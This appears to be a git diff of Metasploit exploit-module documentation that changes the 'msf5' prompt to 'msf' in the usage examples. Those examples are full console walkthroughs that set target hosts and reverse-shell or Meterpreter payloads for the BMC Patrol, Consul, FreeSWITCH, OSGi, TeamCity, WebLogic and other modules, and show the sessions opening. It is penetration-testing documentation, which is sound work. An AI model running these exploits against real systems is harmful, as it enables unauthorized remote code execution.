exploit(multi/local/xorg_x11_suid_server_modulepath) > run +msf exploit(multi/local/xorg_x11_suid_server_modulepath) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.16.215.1:4444 diff --git a/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md b/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md index f6f2ebd819..bd6e7da38b 100644 --- a/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md +++ b/documentation/modules/exploit/multi/misc/bmc_patrol_cmd_exec.md @@ -27,20 +27,20 @@ The exploit module contains several targets as detailed below. ### Target 0: Windows Powershell Injected Shellcode This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). - msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 + msf > use exploit/multi/misc/bmc_patrol_cmd_exec + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 RHOSTS => 192.168.162.133 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 LHOST => 192.168.162.128 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user USER => user - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password PASSWORD => password - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j + msf exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j [*] Exploit running as background job 0. - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > + msf exploit(multi/misc/bmc_patrol_cmd_exec) > [*] Started reverse TCP handler on 192.168.162.128:4444 [*] 192.168.162.133:3181 - Connected to BMC Patrol Agent. [*] 192.168.162.133:3181 - Successfully authenticated user. @@ -51,22 +51,22 @@ This module target provides support for command staging to enable arbitrary Meta ### Target 1: Generic Cmd This target can be used with *cmd* payloads to execute operating system commands against the target host. - msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130 + msf > use exploit/multi/misc/bmc_patrol_cmd_exec + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130 RHOSTS => 192.168.162.130 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128 LHOST => 192.168.162.128 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol USER => patrol - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password PASSWORD => password - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1 + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1 TARGET => 1 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat PAYLOAD => cmd/unix/reverse_netcat - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j + msf exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j [*] Exploit running as background job 0. - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > + msf exploit(multi/misc/bmc_patrol_cmd_exec) > [*] Started reverse TCP handler on 192.168.162.128:4444 [*] 192.168.162.130:3181 - Connected to BMC Patrol Agent. [*] 192.168.162.130:3181 - Successfully authenticated user. @@ -76,15 +76,15 @@ This target can be used with *cmd* payloads to execute operating system commands ### Target Cmd Execution: Windows/Unix/Linux This target isn't a formal target. It was added to allow a user to execute commands entirely through the Patrol Agent remote administration feature and view the output. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0. - msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 + msf > use exploit/multi/misc/bmc_patrol_cmd_exec + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133 RHOSTS => 192.168.162.133 - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user USER => user - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password PASSWORD => password - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami - msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit + msf exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami + msf exploit(multi/misc/bmc_patrol_cmd_exec) > exploit [*] 192.168.162.133:3181 - Connected to BMC Patrol Agent. [*] 192.168.162.133:3181 - Successfully authenticated user. [*] 192.168.162.133:3181 - Command to execute: whoami diff --git a/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md index 37ee541574..41005d6810 100644 --- a/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md +++ b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md @@ -31,14 +31,14 @@ can exploit this vulnerability by uploading a reboot.bat or reboot.sh file and e ### Remote target ``` - msf5 > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1 + msf > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1 rhost => 127.0.0.1 - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1 + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1 lhost => 127.0.0.1 - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234 + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234 lport => 1234 - msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit + msf exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit [*] Started reverse TCP handler on 127.0.0.1:1234 [*] Command shell session 1 opened (127.0.0.1:1234 -> 127.0.0.1:3333) at 2018-07-02 18:43:41 +0000 diff --git a/documentation/modules/exploit/multi/misc/consul_rexec_exec.md b/documentation/modules/exploit/multi/misc/consul_rexec_exec.md index d5e144ff4d..800db3c0f4 100644 --- a/documentation/modules/exploit/multi/misc/consul_rexec_exec.md +++ b/documentation/modules/exploit/multi/misc/consul_rexec_exec.md @@ -67,16 +67,16 @@ You can verify the module against the vulnerable application with those steps: Exploit running against a Docker [consul](https://hub.docker.com/_/consul/) container target: ``` -msf5 > use exploit/multi/misc/consul_rexec_exec -msf5 exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4 +msf > use exploit/multi/misc/consul_rexec_exec +msf exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4 RHOSTS => 172.17.0.4 -msf5 exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1 +msf exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1 LHOST => 172.17.42.1 -msf5 exploit(multi/misc/consul_rexec_exec) > check +msf exploit(multi/misc/consul_rexec_exec) > check [+] 172.17.0.4:8500 The target is vulnerable. -msf5 exploit(multi/misc/consul_rexec_exec) > run +msf exploit(multi/misc/consul_rexec_exec) > run [*] Started reverse TCP handler on 172.17.42.1:4444 [*] Creating session. diff --git a/documentation/modules/exploit/multi/misc/consul_service_exec.md b/documentation/modules/exploit/multi/misc/consul_service_exec.md index 943230dbb5..5759dc6b87 100644 --- a/documentation/modules/exploit/multi/misc/consul_service_exec.md +++ b/documentation/modules/exploit/multi/misc/consul_service_exec.md @@ -64,16 +64,16 @@ You can verify the module against the vulnerable application with those steps: Exploit running against a Docker [consul](https://hub.docker.com/_/consul/) container target: ``` -msf5 > use exploit/multi/misc/consul_service_exec -msf5 exploit(multi/misc/consul_service_exec) > set RHOSTS 172.17.0.4 +msf > use exploit/multi/misc/consul_service_exec +msf exploit(multi/misc/consul_service_exec) > set RHOSTS 172.17.0.4 RHOSTS => 172.17.0.4 -msf5 exploit(multi/misc/consul_service_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/misc/consul_service_exec) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/misc/consul_service_exec) > set LHOST 172.17.42.1 +msf exploit(multi/misc/consul_service_exec) > set LHOST 172.17.42.1 LHOST => 172.17.42.1 -msf5 exploit(multi/misc/consul_service_exec) > check +msf exploit(multi/misc/consul_service_exec) > check [+] 172.17.0.4:8500 The target is vulnerable. -msf5 exploit(multi/misc/consul_rexec_exec) > run +msf exploit(multi/misc/consul_rexec_exec) > run [*] Started reverse TCP handler on 172.17.42.1:4444 [*] Creating service 'BBBDX' diff --git a/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md b/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md index a4cc76a865..39660e716f 100644 --- a/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md +++ b/documentation/modules/exploit/multi/misc/freeswitch_event_socket_cmd_exec.md @@ -55,15 +55,15 @@ ### Windows PowerShell Target ``` -msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" +msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" [*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.242) [*] Local TCP relay created: :1234 <-> 127.0.0.1:8021 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 rport => 1234 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets Exploit targets: @@ -76,11 +76,11 @@ Exploit targets: 4 Windows (Dropper) -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2 target => 2 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] 127.0.0.1:1234 - Login success @@ -107,15 +107,15 @@ meterpreter > ### Linux Dropper Target ``` -msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" +msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" [*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.172) [*] Local TCP relay created: :1234 <-> 127.0.0.1:8021 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 rport => 1234 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets Exploit targets: @@ -128,13 +128,13 @@ Exploit targets: 4 Windows (Dropper) -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 1 target => 1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmdstager::flavor wget +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmdstager::flavor wget cmdstager::flavor => wget -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] 127.0.0.1:1234 - Login success @@ -165,15 +165,15 @@ meterpreter > ### UNIX Generic Command Target ``` -msf5 > use exploit/multi/misc/freeswitch_event_socket_cmd_exec -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" +msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > sessions -i 1 -C "portfwd add -l 1234 -p 8021 -r 127.0.0.1" [*] Running 'portfwd add -l 1234 -p 8021 -r 127.0.0.1' on meterpreter session 1 (172.16.191.172) [*] Local TCP relay created: :1234 <-> 127.0.0.1:8021 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rport 1234 rport => 1234 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets Exploit targets: @@ -186,15 +186,15 @@ Exploit targets: 4 Windows (Dropper) -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 0 +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 0 target => 0 -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set payload cmd/unix/generic +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set payload cmd/unix/generic payload => cmd/unix/generic -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmd "id; uname -a" +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set cmd "id; uname -a" cmd => id; uname -a -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set verbose true +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set verbose true verbose => true -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run [*] 127.0.0.1:1234 - Login success [*] 127.0.0.1:1234 - Sending payload (12 bytes) ... @@ -205,5 +205,5 @@ uid=999(freeswitch) gid=999(freeswitch) groups=999(freeswitch) Linux freeswitch-vm 3.16.0-4-amd64 #1 SMP Debian 3.16.36-1+deb8u1 (2016-09-03) x86_64 GNU/Linux [*] Exploit completed, but no session was created. -msf5 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > +msf exploit(multi/misc/freeswitch_event_socket_cmd_exec) > ``` diff --git a/documentation/modules/exploit/multi/misc/msfd_rce_remote.md b/documentation/modules/exploit/multi/misc/msfd_rce_remote.md index a2a2c29292..9811cfafe3 100644 --- a/documentation/modules/exploit/multi/misc/msfd_rce_remote.md +++ b/documentation/modules/exploit/multi/misc/msfd_rce_remote.md @@ -51,16 +51,16 @@ Source code and installers: ### Remote target ``` - msf5 > use exploit/multi/misc/msfd_rce_remote - msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101 + msf > use exploit/multi/misc/msfd_rce_remote + msf exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101 rhost => 192.168.56.101 - msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp + msf exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp payload => ruby/shell_reverse_tcp - msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17 + msf exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17 lhost => 192.168.0.17 - msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443 + msf exploit(multi/misc/msfd_rce_remote) > set lport 443 lport => 443 - msf5 exploit(multi/misc/msfd_rce_remote) > exploit + msf exploit(multi/misc/msfd_rce_remote) > exploit [-] Handler failed to bind to 192.168.0.17:443:- - [*] Started reverse TCP handler on 0.0.0.0:443 @@ -91,10 +91,10 @@ Source code and installers: [*] Local TCP relay created: :55554 <-> 127.0.0.1:55554 meterpreter > background [*] Backgrounding session 2... - msf5 > use exploit/multi/misc/msfd_rce_remote - msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1 + msf > use exploit/multi/misc/msfd_rce_remote + msf exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1 rhost => 127.0.0.1 - msf5 exploit(multi/misc/msfd_rce_remote) > exploit + msf exploit(multi/misc/msfd_rce_remote) > exploit [-] Handler failed to bind to 192.168.0.17:443:- - [*] Started reverse TCP handler on 0.0.0.0:443 diff --git a/documentation/modules/exploit/multi/misc/osgi_console_exec.md b/documentation/modules/exploit/multi/misc/osgi_console_exec.md index cffb4c097d..810ae05519 100644 --- a/documentation/modules/exploit/multi/misc/osgi_console_exec.md +++ b/documentation/modules/exploit/multi/misc/osgi_console_exec.md @@ -92,14 +92,14 @@ You can verify the module against the vulnerable application with those steps: Exploit running against a Ubuntu Linux target: ``` -msf5 > use exploit/multi/misc/osgi_console_exec -msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4 -msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555 -msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 0 -msf5 exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp -msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 -msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444 -msf5 exploit(multi/misc/osgi_console_exec) > run +msf > use exploit/multi/misc/osgi_console_exec +msf exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4 +msf exploit(multi/misc/osgi_console_exec) > set RPORT 5555 +msf exploit(multi/misc/osgi_console_exec) > set TARGET 0 +msf exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp +msf exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 +msf exploit(multi/misc/osgi_console_exec) > set LPORT 4444 +msf exploit(multi/misc/osgi_console_exec) > run [*] Exploit running as background job 1. [*] Started reverse TCP handler on 172.20.10.2:4444 [*] 172.20.10.4:5555 - Accessing the OSGi console ... @@ -109,7 +109,7 @@ msf5 exploit(multi/misc/osgi_console_exec) > run [*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.4:39314) at 2018-02-14 19:17:39 +0100 [*] 172.20.10.4:5555 - Command Stager progress - 100.00% done (763/763 bytes) -msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 2 +msf exploit(multi/misc/osgi_console_exec) > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer : 172.20.10.4 @@ -125,14 +125,14 @@ Meterpreter : x86/linux Exploit running against a Windows 7 target: ``` -msf5 > use exploit/multi/misc/osgi_console_exec -msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3 -msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555 -msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 1 -msf5 exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp -msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 -msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444 -msf5 exploit(multi/misc/osgi_console_exec) > run +msf > use exploit/multi/misc/osgi_console_exec +msf exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3 +msf exploit(multi/misc/osgi_console_exec) > set RPORT 5555 +msf exploit(multi/misc/osgi_console_exec) > set TARGET 1 +msf exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp +msf exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2 +msf exploit(multi/misc/osgi_console_exec) > set LPORT 4444 +msf exploit(multi/misc/osgi_console_exec) > run [*] Exploit running as background job 2. [*] Started reverse TCP handler on 172.20.10.2:4444 [*] 172.20.10.3:5555 - Accessing the OSGi console ... @@ -140,7 +140,7 @@ msf5 exploit(multi/misc/osgi_console_exec) > run [*] 172.20.10.3:5555 - 172.20.10.3:5555 - Waiting for session... [*] Sending stage (179779 bytes) to 172.20.10.3 [*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.3:49365) at 2018-02-14 19:14:15 +0100 -msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1 +msf exploit(multi/misc/osgi_console_exec) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo diff --git a/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md b/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md index e66588bdf3..c6875f821e 100644 --- a/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md +++ b/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md @@ -40,14 +40,14 @@ If specified the module will run the specified command instead of executing the ### Windows Server 2012 R2 (x64) with TeamCity Agent 2018.1 ``` -msf5 > use exploit/multi/misc/teamcity_agent_xmlrpc_exec -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set RHOSTS 172.16.198.149 +msf > use exploit/multi/misc/teamcity_agent_xmlrpc_exec +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set RHOSTS 172.16.198.149 RHOSTS => 172.16.198.149 -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set payload windows/meterpreter/reverse_tcp +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set LHOST eth0 +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set LHOST eth0 LHOST => eth0 -msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > run +msf exploit(multi/misc/teamcity_agent_xmlrpc_exec) > run [*] Started reverse TCP handler on 172.16.198.150:4444 [*] Found TeamCity Agent running build version 58245 diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md index d1bfaef5d0..46914cc796 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md @@ -20,17 +20,17 @@ Oracle Weblogic Server v10.3.6.0, v12.1.3.0, v12.2.1.2, and v12.2.1.3 are vulner ### Tested on Windows 10 x64 running Oracle Weblogic Server 10.3.6.0 on JDK v7u17 ``` -msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175 +msf exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175 rhosts => 172.22.222.175 -msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121 +msf exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121 srvhost => 172.22.222.121 -msf5 exploit(multi/misc/weblogic_deserialize) > set srvport 8888 +msf exploit(multi/misc/weblogic_deserialize) > set srvport 8888 srvport => 8888 -msf5 exploit(multi/misc/weblogic_deserialize) > set target 1 +msf exploit(multi/misc/weblogic_deserialize) > set target 1 target => 1 -msf5 exploit(multi/misc/weblogic_deserialize) > run +msf exploit(multi/misc/weblogic_deserialize) > run [*] Exploit running as background job 0. -msf5 exploit(multi/misc/weblogic_deserialize) > +msf exploit(multi/misc/weblogic_deserialize) > [*] Started reverse TCP handler on 172.22.222.121:4444 [*] Sending stage (179779 bytes) to 172.22.222.175 [*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500 @@ -50,22 +50,22 @@ meterpreter > ### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29 ``` -msf5 > use exploit/multi/misc/weblogic_deserialize -msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.205 +msf > use exploit/multi/misc/weblogic_deserialize +msf exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.205 rhosts => 172.22.222.205 -msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.207 +msf exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.207 srvhost => 172.22.222.207 -msf5 exploit(multi/misc/weblogic_deserialize) > set lhost 172.22.222.207 +msf exploit(multi/misc/weblogic_deserialize) > set lhost 172.22.222.207 lhost => 172.22.222.207 -msf5 exploit(multi/misc/weblogic_deserialize) > set verbose true +msf exploit(multi/misc/weblogic_deserialize) > set verbose true verbose => true -msf5 exploit(multi/misc/weblogic_deserialize) > check +msf exploit(multi/misc/weblogic_deserialize) > check [+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0 [*] 172.22.222.205:7001 The target appears to be vulnerable. -msf5 exploit(multi/misc/weblogic_deserialize) > run +msf exploit(multi/misc/weblogic_deserialize) > run [*] Exploit running as background job 0. -msf5 exploit(multi/misc/weblogic_deserialize) > +msf exploit(multi/misc/weblogic_deserialize) > [*] Started reverse TCP handler on 172.22.222.207:4444 [*] 172.22.222.205:7001 - Sending handshake... [*] 172.22.222.205:7001 - Sending client object payload... @@ -75,7 +75,7 @@ msf5 exploit(multi/misc/weblogic_deserialize) > [*] Command shell session 1 opened (172.22.222.207:4444 -> 172.22.222.205:37168) at 2018-08-30 06:10:31 -0500 [*] 172.22.222.205:7001 - Server stopped. -msf5 exploit(multi/misc/weblogic_deserialize) > sessions -i 1 +msf exploit(multi/misc/weblogic_deserialize) > sessions -i 1 [*] Starting interaction with 1... uname -a diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md index 41469c89f3..1b49dd358e 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice.md @@ -35,7 +35,7 @@ in combination with a JDK (`jdk-8u211-windows-x64.exe`). 5. Look for the following output: ``` -msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check +msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check [+] 172.16.135.128:8088 - The target is vulnerable. ``` @@ -54,7 +54,7 @@ Set this to the AsyncResponseService uri, normally it should be `/_async/asyncre ## Scenarios ``` -msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit +msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit [*] Started reverse TCP handler on 172.16.135.1:4444 [*] Generating payload... diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md index 369eec1a4f..bff7d43633 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize_badattr_extcomp.md @@ -49,12 +49,12 @@ ### WebLogic `v12.2.1.4.0` on Windows 10 ``` - msf5 > use exploit/multi/misc/weblogic_deserialize_badattr_extcomp - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.181 + msf > use exploit/multi/misc/weblogic_deserialize_badattr_extcomp + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set rhosts 172.16.215.181 rhosts => 172.16.215.181 - msf5 exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set lhost 172.16.215.1 + msf exploit(multi/misc/weblogic_deserialize_badattr_extcomp) > set lhost 172.16.215.1 